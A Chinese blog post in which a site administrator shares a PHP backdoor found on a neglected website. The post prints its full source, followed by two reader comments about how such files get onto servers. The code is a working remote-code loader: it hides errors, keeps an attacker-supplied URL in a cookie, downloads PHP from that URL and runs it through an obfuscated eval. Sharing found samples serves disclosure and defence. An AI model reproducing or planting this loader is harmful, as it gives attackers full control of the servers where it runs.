最新消息:因从typecho切换到wordpress, 由于转换导入问题,文章可能存在部分乱码或者排版问题,逐个排查修复中...

逮的一个PHP后门

系统运维 admin 4987浏览 2评论

某个网站,久未打理.近期看到有提示后门.

删除之前特将代码放一份上来,有兴趣的看看它是干啥来的.

<?php
@ob_start();
error_reporting(0);
@ini_set('html_errors','0');
@ini_set('display_errors','0');
@ini_set('display_startup_errors','0');
@ini_set('log_errors','0');
@set_time_limit(0);
@clearstatcache();

if (!isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
    die('test');
}

//077beece2008164f7ddd2c44bfa126ee

if (isset($_REQUEST['c'])) {
    setcookie("key", "", time() - 3600);
}

//077beece2008164f7ddd2c44bfa126ee

if (isset($_REQUEST['key'])) {
    setcookie("key", $_REQUEST['key'], time() + 3600 * 24 * 7); //Seven Days.
    $_COOKIE['key'] = $_REQUEST['key'];
}

//077beece2008164f7ddd2c44bfa126ee

if (!isset($_COOKIE['key'])) {
    $html = <<<EOF
    <form method="POST" action="">
    <input type="text" name="key">
    <input type="submit">
    </form>
EOF;
    die($html);
}

//077beece2008164f7ddd2c44bfa126ee

$content =  remove_tags(_dl($_COOKIE['key']));

$func="cr"."eat"."e_fun"."cti"."on";

$remove_tags = $func('$x','ev'.'al'.'("?>".$x);');

$remove_tags($content);

function _dl($url)
{
    try {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $r = curl_exec($ch);
        curl_close($ch);
    } catch (Exception $e) {
        $r = file_get_contents($url);
    }
    return $r;
}

function remove_tags($content){
    return $content;
}

转载请注明:Linc Hu » 逮的一个PHP后门

发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

网友最新评论 (2)

  1. 您好,我的网站服务器上也发现了类似的PHP后门文件。请问这是利用什么漏洞入侵的?我查了日志但没有找到问题的根源。
    fmnfed55年前 (2020-01-09)回复
    • 有的CMS,比如Dedecms有一些评论功能或者提交内容。实际上文件名并没有真正生成(比如扩展名应该为PHP),而且是随机的文件名,这样的话,没办法被执行和调用。
      admin5年前 (2020-01-17)回复